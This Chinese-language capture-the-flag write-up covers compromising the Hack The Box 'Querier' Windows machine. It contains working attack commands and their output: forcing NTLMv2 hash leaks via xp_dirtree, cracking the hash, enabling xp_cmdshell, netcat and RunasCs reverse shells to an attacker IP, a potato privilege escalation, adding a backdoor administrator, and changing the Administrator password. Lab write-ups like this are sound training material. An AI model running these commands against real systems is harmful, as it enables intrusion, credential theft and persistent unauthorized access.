Querier-htb-writeup

0x00 靶场技能介绍

章节技能：SMB匿名访问、EXCEL宏文件泄密、在mssql上执行ntlmv2捕获、xp_cmdshell、自建SMBv2服务、PowerUp.ps1、Groups.xml密码泄露、烂土豆提权

参考链接：无

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.125

2、获取下开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.125    
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:43 CST
Warning: 10.10.10.125 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.125
Host is up (0.43s latency).
Not shown: 64702 closed tcp ports (reset), 819 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.52 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -sV -sC --min-rate=10000 10.10.10.125
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:44 CST
Nmap scan report for 10.10.10.125
Host is up (0.40s latency).

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-05-24T02:40:54+00:00; -8h04m54s from scanner time.
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-05-24T02:29:11
|_Not valid after:  2054-05-24T02:29:11
| ms-sql-ntlm-info: 
|   10.10.10.125:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -8h04m55s, deviation: 1s, median: -8h04m55s
| smb2-time: 
|   date: 2024-05-24T02:40:38
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.45 seconds
                                                                   
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.125 -sU                                                                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 18:47 CST
Warning: 10.10.10.125 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.125
Host is up (0.40s latency).
All 65535 scanned ports on 10.10.10.125 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 76.11 seconds

3、经过枚举发现SMB服务可以匿名访问：

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.125 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                 
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.125\\Reports -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 07:23:48 2019
  ..                                  D        0  Tue Jan 29 07:23:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 06:21:34 2019

                5158399 blocks of size 4096. 851722 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (5.0 KiloBytes/sec) (average 5.0 KiloBytes/sec)
smb: \> 

4、在这里发现了一个.xlsm的文件，该文件一般都是带宏的文件，简单看了下属性发现有用户名信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./Currency\ Volume\ Report.xlsm 
ExifTool Version Number         : 12.70
File Name                       : Currency Volume Report.xlsm
Directory                       : .
File Size                       : 12 kB
File Modification Date/Time     : 2024:05:24 19:01:37+08:00
File Access Date/Time           : 2024:05:24 19:03:54+08:00
File Inode Change Date/Time     : 2024:05:24 19:01:37+08:00
File Permissions                : -rw-r--r--
File Type                       : XLSM
File Type Extension             : xlsm
MIME Type                       : application/vnd.ms-excel.sheet.macroEnabled.12
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0x513599ac
Zip Compressed Size             : 367
Zip Uncompressed Size           : 1087
Zip File Name                   : [Content_Types].xml
Creator                         : Luis
Last Modified By                : Luis
Create Date                     : 2019:01:21 20:38:56Z
Modify Date                     : 2019:01:27 22:21:34Z
Application                     : Microsoft Excel
Doc Security                    : None
Scale Crop                      : No
Heading Pairs                   : Worksheets, 1
Titles Of Parts                 : Currency Volume
Company                         : 
Links Up To Date                : No
Shared Doc                      : No
Hyperlinks Changed              : No

5、再打开这个带宏的文档时，并没有发现宏文件，只有通过解压压缩包，并使用Stings才发现点信息

shiyan@InfoSec xl % strings vbaProject.bin
 macro to pull data for client volume reports
n.Conn]
Open
rver=<
SELECT * FROM volume;
word>
 MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
 further testing required
Attribut
e VB_Nam
e = "Thi
sWorkboo
0{00020P819-
$0046}
.........................
1Bxq
Sheet1G
S@#e@Xt
ThisWorkbook
Sheet1
ID="{7819C482-CC73-4FB3-8245-31BB2E19C38A}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="191BC9EFCDEFCDEFCDEFCD"
DPB="8D8F5D2BA59EA69EA69E"
GC="0103D1D2D2D2D22D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisWorkbook=26, 26, 1062, 609, C
Sheet1=52, 52, 1088, 635, C
shiyan@InfoSec xl %

6、这里可以知道这个脚本是用来连接数据库的

Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

7、尝试使用impacket-mssqlclient工具进行登录该数据库

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\reporting  reporting@volume)> EXEC xp_dirtree '\\10.10.14.45\share'
subdirectory   depth   
------------   -----   
SQL (QUERIER\reporting  reporting@volume)> 

8、这里再尝试时发现，可以抓取到ntlmv2的哈希值

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d
[sudo] kali 的密码：
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:4d2c8f6e0e94bb2b:B2486F004B7B45EEFDC992F4413FC10A:0101000000000000803FB23B13AEDA012DF3F0BA86114DAD0000000002000800440036003100420001001E00570049004E002D003100490043004A004C005800410046004D003700390004003400570049004E002D003100490043004A004C005800410046004D00370039002E0044003600310042002E004C004F00430041004C000300140044003600310042002E004C004F00430041004C000500140044003600310042002E004C004F00430041004C0007000800803FB23B13AEDA0106000400020000000800300030000000000000000000000000300000E6C0EEF17EB29F12B26A42D8DD8F8215437425F7AD3ABF74FE5A35338566DFA40A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0034003500000000000000000000000000   

9、经破解获取到账号密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "ntlmv2"
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 hash  /usr/share/wordlists/rockyou.txt 
[sudo] kali 的密码：
hashcat (v6.2.6) starting
.........

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

MSSQL-SVC::QUERIER:4d2c8f6e0e94bb2b:b2486f004b7b45eefdc992f4413fc10a:0101000000000000803fb23b13aeda012df3f0ba86114dad0000000002000800440036003100420001001e00570049004e002d003100490043004a004c005800410046004d003700390004003400570049004e002d003100490043004a004c005800410046004d00370039002e0044003600310042002e004c004f00430041004c000300140044003600310042002e004c004f00430041004c000500140044003600310042002e004c004f00430041004c0007000800803fb23b13aeda0106000400020000000800300030000000000000000000000000300000e6c0eef17eb29f12b26a42d8dd8f8215437425f7ad3abf74fe5a35338566dfa40a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0034003500000000000000000000000000:corporate568

.......
Stopped: Fri May 24 20:12:12 2024

10、经过尝试发现，该账号密码只能登录数据库，不过该账号是数据库的sa权限，可以使用xp_cmdshell模块

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-mssqlclient mssql-svc:'corporate568'@10.10.10.125 -windows-auth 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL (QUERIER\mssql-svc  dbo@master)> SELECT IS_SRVROLEMEMBER ('sysadmin');
    
-   
1   

SQL (QUERIER\mssql-svc  dbo@master)> EXEC sp_configure 'Show Advanced Options', 1; 
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> reconfigure; 
SQL (QUERIER\mssql-svc  dbo@master)> sp_configure; 
name                                    minimum      maximum   config_value    run_value   
---------------------------------   -----------   ----------   ------------   ----------   
......

xp_cmdshell                                   0            1              0            0   

SQL (QUERIER\mssql-svc  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1 
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> reconfigure; 
SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "whoami"
output              
-----------------   
querier\mssql-svc   

NULL                

SQL (QUERIER\mssql-svc  dbo@master)> 

11、这里直接powershell运行base64的反弹shell不行，看来只能下载nc进行反弹shell了

12、经过初步尝试，发现无法通过网络的形式下载nc，会提示存在恶意木马

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "dir C:\Users"
output                                                 
----------------------------------------------------   
 Volume in drive C has no label.                       

 Volume Serial Number is 35CB-DA81                     

NULL                                                   

 Directory of C:\Users                                 

NULL                                                   

01/29/2019  12:41 AM    <DIR>          .               

01/29/2019  12:41 AM    <DIR>          ..              

01/28/2019  11:17 PM    <DIR>          Administrator   

01/29/2019  12:42 AM    <DIR>          mssql-svc       

01/28/2019  11:17 PM    <DIR>          Public          

               0 File(s)              0 bytes          

               5 Dir(s)   3,472,916,480 bytes free     

NULL                                                   

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "dir C:\Users\mssql-svc\Desktop"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is 35CB-DA81                   

NULL                                                 

 Directory of C:\Users\mssql-svc\Desktop             

NULL                                                 

01/29/2019  12:42 AM    <DIR>          .             

01/29/2019  12:42 AM    <DIR>          ..            

05/24/2024  03:29 AM                34 user.txt      

               1 File(s)             34 bytes        

               2 Dir(s)   3,472,916,480 bytes free   

NULL                                                 

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "type C:\Users\mssql-svc\Desktop\user.txt"
output                             
--------------------------------   
81a7d8f059cb2cb1da84c525c7eb46fd   

NULL                               

SQL (QUERIER\mssql-svc  dbo@master)> 

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "powershell -c cd C:\Users\mssql-svc\Desktop; iwr -uri http://10.10.14.45/nc.exe -o ./nc.exe"
output                                                                             
--------------------------------------------------------------------------------   
At line:1 char:1                                                                   

+ cd C:\Users\mssql-svc\Desktop; iwr -uri http://10.10.14.45/nc.exe -o  ...        

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~            

This script contains malicious content and has been blocked by your antivirus software.   

    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException   

    + FullyQualifiedErrorId : ScriptContainedMaliciousContent                      

                                                                                   

NULL                                                                               

SQL (QUERIER\mssql-svc  dbo@master)> 

13、但是可以读取到flag信息，下面尝试换个方法去放置文件

SQL (QUERIER\mssql-svc  dbo@master)> EXEC sp_configure 'Show Advanced Options', 1; 
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> reconfigure; 
SQL (QUERIER\mssql-svc  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1 
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (QUERIER\mssql-svc  dbo@master)> reconfigure; 
SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "copy \\10.10.14.45\share\nc.exe C:\Users\mssql-svc\Desktop\nc.exe"
output                      
-------------------------   
        1 file(s) copied.   

NULL                        

SQL (QUERIER\mssql-svc  dbo@master)> xp_cmdshell "C:\Users\mssql-svc\Desktop\nc.exe -e powershell 10.10.14.45 443"

14、获取到反弹shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443    
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.125] 49679
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
querier\mssql-svc
PS C:\Windows\system32> 

15、这靶机真不容易啊， 我都开始怀疑是不是让我弄免杀了。。。

0x02 系统权限获取

16、这里上传 powerup.ps1 工具进行枚举提权路径

PS C:\Windows\system32> cd C:\Users\mssql-svc\Desktop
cd C:\Users\mssql-svc\Desktop
PS C:\Users\mssql-svc\Desktop> ls
ls


    Directory: C:\Users\mssql-svc\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        5/13/2005  10:53 AM          68608 nc.exe                                                                
-ar---        5/24/2024   3:29 AM             34 user.txt                                                              


PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\PowerUp.ps1 .
copy \\10.10.14.45\share\PowerUp.ps1 .
PS C:\Users\mssql-svc\Desktop> ls
ls


    Directory: C:\Users\mssql-svc\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        5/13/2005  10:53 AM          68608 nc.exe                                                                
-a----        4/20/2024   8:29 AM         600580 PowerUp.ps1                                                           
-ar---        5/24/2024   3:29 AM             34 user.txt 

17、开始执行脚本，并利用

PS C:\Users\mssql-svc\Desktop> powershell -ep bypass
powershell -ep bypass
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> Import-Module ./PowerUp.ps1
Import-Module ./PowerUp.ps1
PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> Invoke-AllChecks
Invoke-AllChecks


Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2544
ProcessId   : 4556
Name        : 4556
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group 
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files



PS C:\Users\mssql-svc\Desktop> 

18、这里发现在 .xml 里直接泄露的管理员的账号密码，下面尝试登录

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec administrator@10.10.10.125                             
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file mhhfnebU.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service XOcr on 10.10.10.125.....
[*] Starting service XOcr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

19、那就获取下最终的flag吧

C:\Windows\system32> cd C:/Users/administrator/Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 35CB-DA81

 Directory of C:\Users\Administrator\Desktop

01/29/2019  01:04 AM    <DIR>          .
01/29/2019  01:04 AM    <DIR>          ..
05/24/2024  03:29 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,463,217,152 bytes free

C:\Users\Administrator\Desktop> type root.txt
df1686fcc228e6ed71a3dbe34cbcdb16

C:\Users\Administrator\Desktop> 

20、明明密码是对的，但是我发现我使用crackmapexec 这个工具，都显示不对，我都怀疑是不是我的这个工具坏了。。。。

21、补充一个提权方法：

PS C:\Users\mssql-svc\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\mssql-svc\Desktop> 

PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\g.exe .
copy \\10.10.14.45\share\g.exe .
PS C:\Users\mssql-svc\Desktop> ls
ls


    Directory: C:\Users\mssql-svc\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/20/2024   8:29 AM          57344 g.exe                                                                 
-a----        5/13/2005  10:53 AM          68608 nc.exe                                                                
-a----        4/20/2024   8:29 AM         600580 PowerUp.ps1                                                           
-ar---        5/24/2024   3:29 AM             34 user.txt                                                              


PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd "cmd /c whoami"
./g.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\5cd7af1f-e64d-439b-9af3-0c4f172010ef\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000d802-0278-ffff-b945-6c415b89088b
[*] DCOM obj OXID: 0xf71bcf9b480c2046
[*] DCOM obj OID: 0x66361540824072e4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4020
nt authority\system
PS C:\Users\mssql-svc\Desktop>

corporate568

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd "cmd /c net user shiyan corporate568 /add"
./g.exe -cmd "cmd /c net user shiyan corporate568 /add"
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ed388708-817d-44aa-ba0d-0b9eb1eef47a\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009402-0378-ffff-bf32-135736469f18
[*] DCOM obj OXID: 0x5c60203ea3d18e7f
[*] DCOM obj OID: 0xf85be75c42c30d4b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3832
The command completed successfully.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd 'cmd /c net localgroup "Administrators" shiyan  /add'
./g.exe -cmd 'cmd /c net localgroup "Administrators" shiyan  /add'
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ba650299-29f0-4b60-8b4c-defe1ac0f86e\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000c02-062c-ffff-e18c-0234d365828b
[*] DCOM obj OXID: 0x9c24b217fdad8f24
[*] DCOM obj OID: 0x1e3bc132b669cfc2
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2116
The command completed successfully.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\RunasCs.exe .\r.exe
copy \\10.10.14.45\share\RunasCs.exe .\r.exe
PS C:\Users\mssql-svc\Desktop> ls
ls


    Directory: C:\Users\mssql-svc\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/20/2024   8:29 AM          57344 g.exe                                                                 
-a----        5/13/2005  10:53 AM          68608 nc.exe                                                                
-a----        4/20/2024   8:29 AM         600580 PowerUp.ps1                                                           
-a----        5/19/2023   5:37 PM          51712 r.exe                                                                 
-ar---        5/24/2024   3:29 AM             34 user.txt                                                              


PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> .\r.exe shiyan corporate568 powershell -r 10.10.14.45:4444 -l 3
.\r.exe shiyan corporate568 powershell -r 10.10.14.45:4444 -l 3
[*] Warning: User profile directory for user shiyan does not exists. Use --force-profile if you want to force the creation.

[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-2177b$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4020 created in background.
PS C:\Users\mssql-svc\Desktop> 

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.125] 49703
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\System32> whoami
whoami
querier\shiyan
PS C:\Windows\System32> cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop
PS C:\Users\Administrator\Desktop> ls
ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        5/24/2024   3:29 AM             34 root.txt                                                              


PS C:\Users\Administrator\Desktop> cat root.txt
cat root.txt
df1686fcc228e6ed71a3dbe34cbcdb16
PS C:\Users\Administrator\Desktop> 

PS C:\Users\Administrator\Desktop> net user Administrator corporate568
net user Administrator corporate568
The command completed successfully.

PS C:\Users\Administrator\Desktop> 

换个密码，直接登录

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.125 -u administrator -p 'corporate568'                     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

完美~

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/175